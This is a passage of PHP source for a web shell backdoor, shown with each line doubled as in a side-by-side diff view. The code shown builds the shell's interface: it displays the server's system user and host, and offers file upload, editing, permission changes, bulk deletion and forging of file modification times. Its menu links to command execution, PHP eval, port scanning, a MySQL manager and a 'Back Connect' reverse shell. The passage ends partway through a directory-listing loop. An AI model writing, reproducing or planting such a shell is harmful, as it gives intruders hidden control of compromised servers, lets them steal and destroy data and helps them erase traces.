207 if (!newdirname) return; 207 if (!newdirname) return;
208 $('createdir').newdirname.value=newdirname; 208 $('createdir').newdirname.value=newdirname;
209 $('createdir').submit(); 209 $('createdir').submit();
210} 210}
211function fileperm(pfile){ 211function fileperm(pfile){
212 var newperm; 212 var newperm;
213 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', ''); 213 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
214 if (!newperm) return; 214 if (!newperm) return;
215 $('fileperm').newperm.value=newperm; 215 $('fileperm').newperm.value=newperm;
216 $('fileperm').pfile.value=pfile; 216 $('fileperm').pfile.value=pfile;
217 $('fileperm').submit(); 217 $('fileperm').submit();
218} 218}
219function copyfile(sname){ 219function copyfile(sname){
220 var tofile; 220 var tofile;
221 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', ''); 221 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
222 if (!tofile) return; 222 if (!tofile) return;
223 $('copyfile').tofile.value=tofile; 223 $('copyfile').tofile.value=tofile;
224 $('copyfile').sname.value=sname; 224 $('copyfile').sname.value=sname;
225 $('copyfile').submit(); 225 $('copyfile').submit();
226} 226}
227function rename(oldname){ 227function rename(oldname){
228 var newfilename; 228 var newfilename;
229 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', ''); 229 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
230 if (!newfilename) return; 230 if (!newfilename) return;
231 $('rename').newfilename.value=newfilename; 231 $('rename').newfilename.value=newfilename;
232 $('rename').oldname.value=oldname; 232 $('rename').oldname.value=oldname;
233 $('rename').submit(); 233 $('rename').submit();
234} 234}
235function dofile(doing,thefile,m){ 235function dofile(doing,thefile,m){
236 if (m && !confirm(m)) { 236 if (m && !confirm(m)) {
237 return; 237 return;
238 } 238 }
239 $('filelist').doing.value=doing; 239 $('filelist').doing.value=doing;
240 if (thefile){ 240 if (thefile){
241 $('filelist').thefile.value=thefile; 241 $('filelist').thefile.value=thefile;
242 } 242 }
243 $('filelist').submit(); 243 $('filelist').submit();
244} 244}
245function createfile(nowpath){ 245function createfile(nowpath){
246 var filename; 246 var filename;
247 filename = prompt('Please input the file name:', ''); 247 filename = prompt('Please input the file name:', '');
248 if (!filename) return; 248 if (!filename) return;
249 opfile('editfile',nowpath + filename,nowpath); 249 opfile('editfile',nowpath + filename,nowpath);
250} 250}
251function opfile(action,opfile,dir){ 251function opfile(action,opfile,dir){
252 $('fileopform').action.value=action; 252 $('fileopform').action.value=action;
253 $('fileopform').opfile.value=opfile; 253 $('fileopform').opfile.value=opfile;
254 $('fileopform').dir.value=dir; 254 $('fileopform').dir.value=dir;
255 $('fileopform').submit(); 255 $('fileopform').submit();
256} 256}
257function godir(dir,view_writable){ 257function godir(dir,view_writable){
258 if (view_writable) { 258 if (view_writable) {
259 $('godir').view_writable.value=view_writable; 259 $('godir').view_writable.value=view_writable;
260 } 260 }
261 $('godir').dir.value=dir; 261 $('godir').dir.value=dir;
262 $('godir').submit(); 262 $('godir').submit();
263} 263}
264function getsize(getdir,dir){ 264function getsize(getdir,dir){
265 $('getsize').getdir.value=getdir; 265 $('getsize').getdir.value=getdir;
266 $('getsize').dir.value=dir; 266 $('getsize').dir.value=dir;
267 $('getsize').submit(); 267 $('getsize').submit();
268} 268}
269function editrecord(action, base64, tablename){ 269function editrecord(action, base64, tablename){
270 if (action == 'del') { 270 if (action == 'del') {
271 if (!confirm('Is or isn\'t deletion record?')) return; 271 if (!confirm('Is or isn\'t deletion record?')) return;
272 } 272 }
273 $('recordlist').doing.value=action; 273 $('recordlist').doing.value=action;
274 $('recordlist').base64.value=base64; 274 $('recordlist').base64.value=base64;
275 $('recordlist').tablename.value=tablename; 275 $('recordlist').tablename.value=tablename;
276 $('recordlist').submit(); 276 $('recordlist').submit();
277} 277}
278function moddbname(dbname) { 278function moddbname(dbname) {
279 if(!dbname) return; 279 if(!dbname) return;
280 $('setdbname').dbname.value=dbname; 280 $('setdbname').dbname.value=dbname;
281 $('setdbname').submit(); 281 $('setdbname').submit();
282} 282}
283function settable(tablename,doing,page) { 283function settable(tablename,doing,page) {
284 if(!tablename) return; 284 if(!tablename) return;
285 if (doing) { 285 if (doing) {
286 $('settable').doing.value=doing; 286 $('settable').doing.value=doing;
287 } 287 }
288 if (page) { 288 if (page) {
289 $('settable').page.value=page; 289 $('settable').page.value=page;
290 } 290 }
291 $('settable').tablename.value=tablename; 291 $('settable').tablename.value=tablename;
292 $('settable').submit(); 292 $('settable').submit();
293} 293}
294function s(action,nowpath,p1,p2,p3,p4,p5) { 294function s(action,nowpath,p1,p2,p3,p4,p5) {
295 if(action) $('opform').action.value=action; 295 if(action) $('opform').action.value=action;
296 if(nowpath) $('opform').nowpath.value=nowpath; 296 if(nowpath) $('opform').nowpath.value=nowpath;
297 if(p1) $('opform').p1.value=p1; 297 if(p1) $('opform').p1.value=p1;
298 if(p2) $('opform').p2.value=p2; 298 if(p2) $('opform').p2.value=p2;
299 if(p3) $('opform').p3.value=p3; 299 if(p3) $('opform').p3.value=p3;
300 if(p4) $('opform').p4.value=p4; 300 if(p4) $('opform').p4.value=p4;
301 if(p5) $('opform').p4.value=p5; 301 if(p5) $('opform').p4.value=p5;
302} 302}
303function g(action,nowpath,p1,p2,p3,p4,p5) { 303function g(action,nowpath,p1,p2,p3,p4,p5) {
304 if(!action) return; 304 if(!action) return;
305 s(action,nowpath,p1,p2,p3,p4,p5); 305 s(action,nowpath,p1,p2,p3,p4,p5);
306 $('opform').submit(); 306 $('opform').submit();
307} 307}
308</script> 308</script>
309</head> 309</head>
310<body style="margin:0;table-layout:fixed; word-break:break-all"> 310<body style="margin:0;table-layout:fixed; word-break:break-all">
311<?php 311<?php
312formhead(array('name'=>'opform')); 312formhead(array('name'=>'opform'));
313makehide('action', $action); 313makehide('action', $action);
314makehide('nowpath', $nowpath); 314makehide('nowpath', $nowpath);
315makehide('p1', $p1); 315makehide('p1', $p1);
316makehide('p2', $p2); 316makehide('p2', $p2);
317makehide('p3', $p3); 317makehide('p3', $p3);
318makehide('p4', $p4); 318makehide('p4', $p4);
319makehide('p5', $p5); 319makehide('p5', $p5);
320formfoot(); 320formfoot();
321 321
322if(!function_exists('posix_getegid')) { 322if(!function_exists('posix_getegid')) {
323 $user = @get_current_user(); 323 $user = @get_current_user();
324 $uid = @getmyuid(); 324 $uid = @getmyuid();
325 $gid = @getmygid(); 325 $gid = @getmygid();
326 $group = "?"; 326 $group = "?";
327} else { 327} else {
328 $uid = @posix_getpwuid(@posix_geteuid()); 328 $uid = @posix_getpwuid(@posix_geteuid());
329 $gid = @posix_getgrgid(@posix_getegid()); 329 $gid = @posix_getgrgid(@posix_getegid());
330 $user = $uid['name']; 330 $user = $uid['name'];
331 $uid = $uid['uid']; 331 $uid = $uid['uid'];
332 $group = $gid['name']; 332 $group = $gid['name'];
333 $gid = $gid['gid']; 333 $gid = $gid['gid'];
334} 334}
335 335
336?> 336?>
337<table width="100%" border="0" cellpadding="0" cellspacing="0"> 337<table width="100%" border="0" cellpadding="0" cellspacing="0">
338 <tr class="head"> 338 <tr class="head">
339 <td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td> 339 <td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
340 </tr> 340 </tr>
341 <tr class="alt1"> 341 <tr class="alt1">
342 <td> 342 <td>
343 <span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span> 343 <span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>
344 <a href="javascript:g('logout');">Logout</a> | 344 <a href="javascript:g('logout');">Logout</a> |
345 <a href="javascript:g('file');">File Manager</a> | 345 <a href="javascript:g('file');">File Manager</a> |
346 <a href="javascript:g('mysqladmin');">MYSQL Manager</a> | 346 <a href="javascript:g('mysqladmin');">MYSQL Manager</a> |
347 <a href="javascript:g('sqlfile');">MySQL Upload &amp; Download</a> | 347 <a href="javascript:g('sqlfile');">MySQL Upload &amp; Download</a> |
348 <a href="javascript:g('shell');">Execute Command</a> | 348 <a href="javascript:g('shell');">Execute Command</a> |
349 <a href="javascript:g('phpenv');">PHP Variable</a> | 349 <a href="javascript:g('phpenv');">PHP Variable</a> |
350 <a href="javascript:g('portscan');">Port Scan</a> | 350 <a href="javascript:g('portscan');">Port Scan</a> |
351 <a href="javascript:g('secinfo');">Security information</a> | 351 <a href="javascript:g('secinfo');">Security information</a> |
352 <a href="javascript:g('eval');">Eval PHP Code</a> 352 <a href="javascript:g('eval');">Eval PHP Code</a>
353 <?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?> 353 <?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?>
354 </td> 354 </td>
355 </tr> 355 </tr>
356</table> 356</table>
357<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td> 357<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
358<?php 358<?php
359$errmsg && m($errmsg); 359$errmsg && m($errmsg);
360 360
361// 获取当前路径 361// 获取当前路径
362if (!$dir) { 362if (!$dir) {
363 $dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.'; 363 $dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
364} 364}
365$nowpath = getPath(SA_ROOT, $dir); 365$nowpath = getPath(SA_ROOT, $dir);
366if (substr($dir, -1) != '/') { 366if (substr($dir, -1) != '/') {
367 $dir = $dir.'/'; 367 $dir = $dir.'/';
368} 368}
369 369
370if ($action == 'file') { 370if ($action == 'file') {
371 371
372 // 判断读写情况 372 // 判断读写情况
373 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable'; 373 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
374 374
375 // 创建目录 375 // 创建目录
376 if ($newdirname) { 376 if ($newdirname) {
377 $mkdirs = $nowpath.$newdirname; 377 $mkdirs = $nowpath.$newdirname;
378 if (file_exists($mkdirs)) { 378 if (file_exists($mkdirs)) {
379 m('Directory has already existed'); 379 m('Directory has already existed');
380 } else { 380 } else {
381 m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed')); 381 m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
382 @chmod($mkdirs,0777); 382 @chmod($mkdirs,0777);
383 } 383 }
384 } 384 }
385 385
386 // 上传文件 386 // 上传文件
387 elseif ($doupfile) { 387 elseif ($doupfile) {
388 m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed')); 388 m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
389 } 389 }
390 390
391 // 编辑文件 391 // 编辑文件
392 elseif ($editfilename && $filecontent) { 392 elseif ($editfilename && $filecontent) {
393 $fp = @fopen($editfilename,'w'); 393 $fp = @fopen($editfilename,'w');
394 m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed')); 394 m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
395 @fclose($fp); 395 @fclose($fp);
396 } 396 }
397 397
398 // 编辑文件属性 398 // 编辑文件属性
399 elseif ($pfile && $newperm) { 399 elseif ($pfile && $newperm) {
400 if (!file_exists($pfile)) { 400 if (!file_exists($pfile)) {
401 m('The original file does not exist'); 401 m('The original file does not exist');
402 } else { 402 } else {
403 $newperm = base_convert($newperm,8,10); 403 $newperm = base_convert($newperm,8,10);
404 m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed')); 404 m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
405 } 405 }
406 } 406 }
407 407
408 // 改名 408 // 改名
409 elseif ($oldname && $newfilename) { 409 elseif ($oldname && $newfilename) {
410 $nname = $nowpath.$newfilename; 410 $nname = $nowpath.$newfilename;
411 if (file_exists($nname) || !file_exists($oldname)) { 411 if (file_exists($nname) || !file_exists($oldname)) {
412 m($nname.' has already existed or original file does not exist'); 412 m($nname.' has already existed or original file does not exist');
413 } else { 413 } else {
414 m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed')); 414 m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
415 } 415 }
416 } 416 }
417 417
418 // 复制文件 418 // 复制文件
419 elseif ($sname && $tofile) { 419 elseif ($sname && $tofile) {
420 if (file_exists($tofile) || !file_exists($sname)) { 420 if (file_exists($tofile) || !file_exists($sname)) {
421 m('The goal file has already existed or original file does not exist'); 421 m('The goal file has already existed or original file does not exist');
422 } else { 422 } else {
423 m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed')); 423 m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
424 } 424 }
425 } 425 }
426 426
427 // 克隆时间 427 // 克隆时间
428 elseif ($curfile && $tarfile) { 428 elseif ($curfile && $tarfile) {
429 if (!@file_exists($curfile) || !@file_exists($tarfile)) { 429 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
430 m('The goal file has already existed or original file does not exist'); 430 m('The goal file has already existed or original file does not exist');
431 } else { 431 } else {
432 $time = @filemtime($tarfile); 432 $time = @filemtime($tarfile);
433 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); 433 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
434 } 434 }
435 } 435 }
436 436
437 // 自定义时间 437 // 自定义时间
438 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) { 438 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
439 if (!@file_exists($curfile)) { 439 if (!@file_exists($curfile)) {
440 m(basename($curfile).' does not exist'); 440 m(basename($curfile).' does not exist');
441 } else { 441 } else {
442 $time = strtotime("$year-$month-$day $hour:$minute:$second"); 442 $time = strtotime("$year-$month-$day $hour:$minute:$second");
443 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); 443 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
444 } 444 }
445 } 445 }
446 446
447 // 批量删除文件 447 // 批量删除文件
448 elseif($doing == 'delfiles') { 448 elseif($doing == 'delfiles') {
449 if ($dl) { 449 if ($dl) {
450 $dfiles=''; 450 $dfiles='';
451 $succ = $fail = 0; 451 $succ = $fail = 0;
452 foreach ($dl as $filepath) { 452 foreach ($dl as $filepath) {
453 if (is_dir($filepath)) { 453 if (is_dir($filepath)) {
454 if (@deltree($filepath)) { 454 if (@deltree($filepath)) {
455 $succ++; 455 $succ++;
456 } else { 456 } else {
457 $fail++; 457 $fail++;
458 } 458 }
459 } else { 459 } else {
460 if (@unlink($filepath)) { 460 if (@unlink($filepath)) {
461 $succ++; 461 $succ++;
462 } else { 462 } else {
463 $fail++; 463 $fail++;
464 } 464 }
465 } 465 }
466 } 466 }
467 m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail); 467 m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
468 } else { 468 } else {
469 m('Please select folder/file(s)'); 469 m('Please select folder/file(s)');
470 } 470 }
471 } 471 }
472 472
473 //操作完毕 473 //操作完毕
474 formhead(array('name'=>'createdir')); 474 formhead(array('name'=>'createdir'));
475 makehide('newdirname'); 475 makehide('newdirname');
476 makehide('dir',$nowpath); 476 makehide('dir',$nowpath);
477 formfoot(); 477 formfoot();
478 formhead(array('name'=>'fileperm')); 478 formhead(array('name'=>'fileperm'));
479 makehide('newperm'); 479 makehide('newperm');
480 makehide('pfile'); 480 makehide('pfile');
481 makehide('dir',$nowpath); 481 makehide('dir',$nowpath);
482 formfoot(); 482 formfoot();
483 formhead(array('name'=>'copyfile')); 483 formhead(array('name'=>'copyfile'));
484 makehide('sname'); 484 makehide('sname');
485 makehide('tofile'); 485 makehide('tofile');
486 makehide('dir',$nowpath); 486 makehide('dir',$nowpath);
487 formfoot(); 487 formfoot();
488 formhead(array('name'=>'rename')); 488 formhead(array('name'=>'rename'));
489 makehide('oldname'); 489 makehide('oldname');
490 makehide('newfilename'); 490 makehide('newfilename');
491 makehide('dir',$nowpath); 491 makehide('dir',$nowpath);
492 formfoot(); 492 formfoot();
493 formhead(array('name'=>'fileopform', 'target'=>'_blank')); 493 formhead(array('name'=>'fileopform', 'target'=>'_blank'));
494 makehide('action'); 494 makehide('action');
495 makehide('opfile'); 495 makehide('opfile');
496 makehide('dir'); 496 makehide('dir');
497 formfoot(); 497 formfoot();
498 formhead(array('name'=>'getsize')); 498 formhead(array('name'=>'getsize'));
499 makehide('getdir'); 499 makehide('getdir');
500 makehide('dir'); 500 makehide('dir');
501 formfoot(); 501 formfoot();
502 502
503 $free = @disk_free_space($nowpath); 503 $free = @disk_free_space($nowpath);
504 !$free && $free = 0; 504 !$free && $free = 0;
505 $all = @disk_total_space($nowpath); 505 $all = @disk_total_space($nowpath);
506 !$all && $all = 0; 506 !$all && $all = 0;
507 $used = $all-$free; 507 $used = $all-$free;
508 p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>'); 508 p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
509 509
510 $cwd_links = ''; 510 $cwd_links = '';
511 $path = explode('/', $nowpath); 511 $path = explode('/', $nowpath);
512 $n=count($path); 512 $n=count($path);
513 for($i=0;$i<$n-1;$i++) { 513 for($i=0;$i<$n-1;$i++) {
514 $cwd_links .= '<a href="javascript:godir(\''; 514 $cwd_links .= '<a href="javascript:godir(\'';
515 for($j=0;$j<=$i;$j++) { 515 for($j=0;$j<=$i;$j++) {
516 $cwd_links .= $path[$j].'/'; 516 $cwd_links .= $path[$j].'/';
517 } 517 }
518 $cwd_links .= '\');">'.$path[$i].'/</a>'; 518 $cwd_links .= '\');">'.$path[$i].'/</a>';
519 } 519 }
520 520
521?> 521?>
522<script type="text/javascript"> 522<script type="text/javascript">
523document.onclick = shownav; 523document.onclick = shownav;
524function shownav(e){ 524function shownav(e){
525 var src = e?e.target:event.srcElement; 525 var src = e?e.target:event.srcElement;
526 do{ 526 do{
527 if(src.id =="jumpto") { 527 if(src.id =="jumpto") {
528 $('inputnav').style.display = ""; 528 $('inputnav').style.display = "";
529 $('pathnav').style.display = "none"; 529 $('pathnav').style.display = "none";
530 //hidenav(); 530 //hidenav();
531 return; 531 return;
532 } 532 }
533 if(src.id =="inputnav") { 533 if(src.id =="inputnav") {
534 return; 534 return;
535 } 535 }
536 src = src.parentNode; 536 src = src.parentNode;
537 }while(src.parentNode) 537 }while(src.parentNode)
538 538
539 $('inputnav').style.display = "none"; 539 $('inputnav').style.display = "none";
540 $('pathnav').style.display = ""; 540 $('pathnav').style.display = "";
541} 541}
542</script> 542</script>
543<div style="background:#eee;margin-bottom:10px;"> 543<div style="background:#eee;margin-bottom:10px;">
544 <table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0"> 544 <table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
545 <tr> 545 <tr>
546 <td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td> 546 <td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>
547 <td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td> 547 <td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
548 </tr> 548 </tr>
549 </table> 549 </table>
550 <table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;"> 550 <table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
551 <form action="" method="post" id="godir" name="godir"> 551 <form action="" method="post" id="godir" name="godir">
552 <tr> 552 <tr>
553 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td> 553 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
554 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td> 554 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>
555 <td nowrap><input class="bt" value="GO" type="submit"></td> 555 <td nowrap><input class="bt" value="GO" type="submit"></td>
556 </tr> 556 </tr>
557 </form> 557 </form>
558 </table> 558 </table>
559<?php 559<?php
560 if (IS_WIN && IS_COM) { 560 if (IS_WIN && IS_COM) {
561 $obj = new COM('scripting.filesystemobject'); 561 $obj = new COM('scripting.filesystemobject');
562 if ($obj && is_object($obj) && $obj->Drives) { 562 if ($obj && is_object($obj) && $obj->Drives) {
563 echo '<div class="drives">'; 563 echo '<div class="drives">';
564 $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk'); 564 $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
565 $comma = ''; 565 $comma = '';
566 foreach($obj->Drives as $drive) { 566 foreach($obj->Drives as $drive) {
567 if ($drive->Path) { 567 if ($drive->Path) {
568 p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>'); 568 p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
569 $comma = '<span>|</span>'; 569 $comma = '<span>|</span>';
570 } 570 }
571 } 571 }
572 echo '</div>'; 572 echo '</div>';
573 } 573 }
574 } 574 }
575?> 575?>
576</div> 576</div>
577<?php 577<?php
578 $findstr = $_POST['findstr']; 578 $findstr = $_POST['findstr'];
579 $re = $_POST['re']; 579 $re = $_POST['re'];
580 tbhead(); 580 tbhead();
581 p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">'); 581 p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
582 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>'); 582 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');
583 p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>'); 583 p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
584 p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>'); 584 p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');
585 p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>'); 585 p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
586 p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>'); 586 p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
587 p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )'); 587 p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
588 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>'); 588 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
589 589
590 p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>'); 590 p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');
591 591
592 p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>'); 592 p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
593 593
594 //查看所有可写文件和目录 594 //查看所有可写文件和目录
595 $dirdata=array(); 595 $dirdata=array();
596 $filedata=array(); 596 $filedata=array();
597 597
598 if ($view_writable == 'dir') { 598 if ($view_writable == 'dir') {
599 $dirdata = GetWDirList($nowpath); 599 $dirdata = GetWDirList($nowpath);
600 $filedata = array(); 600 $filedata = array();
601 } elseif ($view_writable == 'file') { 601 } elseif ($view_writable == 'file') {
602 $dirdata = array(); 602 $dirdata = array();
603 $filedata = GetWFileList($nowpath); 603 $filedata = GetWFileList($nowpath);
604 } elseif ($findstr) { 604 } elseif ($findstr) {
605 $dirdata = array(); 605 $dirdata = array();
606 $filedata = GetSFileList($nowpath, $findstr, $re); 606 $filedata = GetSFileList($nowpath, $findstr, $re);
607 } else { 607 } else {
608 // 目录列表 608 // 目录列表
609 //scandir()效率更高 609 //scandir()效率更高
610 $dirs=@opendir($dir); 610 $dirs=@opendir($dir);
611 while ($file=@readdir($dirs)) { 611 while ($file=@readdir($dirs)) {
612 $filepath=$nowpath.$file; 612 $filepath=$nowpath.$file;
613 if(@is_dir($filepath)){ 613 if(@is_dir($filepath)){
614 $dirdb['filename']=$file; 614 $dirdb['filename']=$file;
615 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); 615 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
616 $dirdb['dirchmod']=getChmod($filepath); 616 $dirdb['dirchmod']=getChmod($filepath);
617 $dirdb['dirperm']=getPerms($filepath); 617 $dirdb['dirperm']=getPerms($filepath);
618 $dirdb['fileowner']=getUser($filepath); 618 $dirdb['fileowner']=getUser($filepath);
619 $dirdb['dirlink']=$nowpath; 619 $dirdb['dirlink']=$nowpath;
620 $dirdb['server_link']=$filepath; 620 $dirdb['server_link']=$filepath;
621 $dirdata[]=$dirdb; 621 $dirdata[]=$dirdb;
622 } else { 622 } else {
623 $filedb['filename']=$file; 623 $filedb['filename']=$file;
624 $filedb['size']=sizecount(@filesize($filepath)); 624 $filedb['size']=sizecount(@filesize($filepath));
625 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); 625 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
626 $filedb['filechmod']=getChmod($filepath); 626 $filedb['filechmod']=getChmod($filepath);
627 $filedb['fileperm']=getPerms($filepath); 627 $filedb['fileperm']=getPerms($filepath);
628 $filedb['fileowner']=getUser($filepath); 628 $filedb['fileowner']=getUser($filepath);
629 $filedb['dirlink']=$nowpath; 629 $filedb['dirlink']=$nowpath;
630 $filedb['server_link']=$filepath; 630 $filedb['server_link']=$filepath;
631 $filedata[]=$filedb; 631 $filedata[]=$filedb;
632 } 632 }
633 }// while 633 }// while
634 unset($dirdb); 634 unset($dirdb);
635 unset($filedb); 635 unset($filedb);
636 @closedir($dirs); 636 @closedir($dirs);
637 } 637 }
638 @sort($dirdata); 638 @sort($dirdata);
639 @sort($filedata); 639 @sort($filedata);
640 $dir_i = '0'; 640 $dir_i = '0';
641 641
642 p('<form id="filelist" name="filelist" action="'.$self.'" method="post">'); 642 p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
643 makehide('action','file'); 643 makehide('action','file');
644 makehide('thefile'); 644 makehide('thefile');
645 makehide('doing'); 645 makehide('doing');
646 makehide('dir',$nowpath); 646 makehide('dir',$nowpath);
647 647
648 foreach($dirdata as $key => $dirdb){ 648 foreach($dirdata as $key => $dirdb){
649 if($dirdb['filename']!='..' && $dirdb['filename']!='.') { 649 if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
650 if($getdir && $getdir == $dirdb['server_link']) { 650 if($getdir && $getdir == $dirdb['server_link']) {
651 $attachsize = dirsize($dirdb['server_link']); 651 $attachsize = dirsize($dirdb['server_link']);
